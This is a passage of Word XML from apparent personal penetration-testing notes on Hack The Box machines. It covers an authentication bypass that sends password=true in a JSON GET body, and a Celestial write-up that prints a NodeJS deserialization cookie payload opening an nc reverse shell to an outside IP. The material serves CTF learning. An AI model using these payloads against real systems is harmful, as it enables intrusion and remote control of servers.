    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we manually changed the word POST to GET and kept the password in the request body. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2451100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="466" name="image457.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image457.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1182"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2451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BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, we get an error that the password field is not found. For a GET request, it makes sense</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for the endpoint not to process data in the request body. But, let's try to modify the Content-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type header to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and modify the data format to JSON, to match the format of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the response data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, instead of putting in a string as expected, we will put in a boolean value that might bypass some type of authentication! So, we set the password to be true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2540000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="82" name="image77.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image77.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1183"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2540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C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when we send this request, it works!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5g78begcz6qc" w:id="507"/>
      <w:bookmarkEnd w:id="507"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hex Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Pilgrimage HTB deals with using an exploit to read files (ex. /etc/passwd), but then we get the information back in hex data. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Later on, we actually get some SQLLite database in hex data and the whole write up teaches us how to properly handle it. We had to use a simple python script (like 4 lines). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wuqkun3vd8e2" w:id="508"/>
      <w:bookmarkEnd w:id="508"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Building a serialized payload for code execution through NodeJS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Celestial HTB, we had a very simple but hard box. It had to do with decoding a cookie from Base64, seeing that it's a JSON, and exploiting a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NodeJS deserialization vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the cookie. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serialization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process of converting a data structure or object into a format that can be easily stored or transmitted and later reconstructed. This format is typically a byte stream or a text-based format like JSON or XML. The opposite process, reconstructing the original object from the serialized format, is called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deserialization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Viewing the NodeJS server in a browser presents a 404, however after refreshing the page,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">some text is displayed. Looking at cookies reveals a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">profile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">entry, which is a base64-encoded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON string. Attempting to change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">num </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value to an unquoted string will cause an</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> error which reveals some key information</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when we play around with the JSON, and change the "num" value to a valid number, the website updates and uses that number. So we know that there is definitely some serialization going on from the cookie to the code on the website that is used to display the text. We can try and exploit this. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="144" name="image139.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image139.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1184"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1511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7DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The username is sun and the data appears to be unserialized. A </w:t>
      </w:r>
      <w:hyperlink r:id="rId1185">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">quick search finds several</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1186">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">guides</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on building a serialized payload for code execution through NodeJS. In this case, an exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function can be passed as the username and it will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1187">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{"username":"_$$ND_FUNC$$_require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/f|/bin/sh -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.16.7 44444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;/tmp/f', function(error, stdout, stderr) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log(stdout) })","country":"Lameville","city":"Lametown","num":"2"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to encode this in Base64 before using this as a cookie. And also change the IP and Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
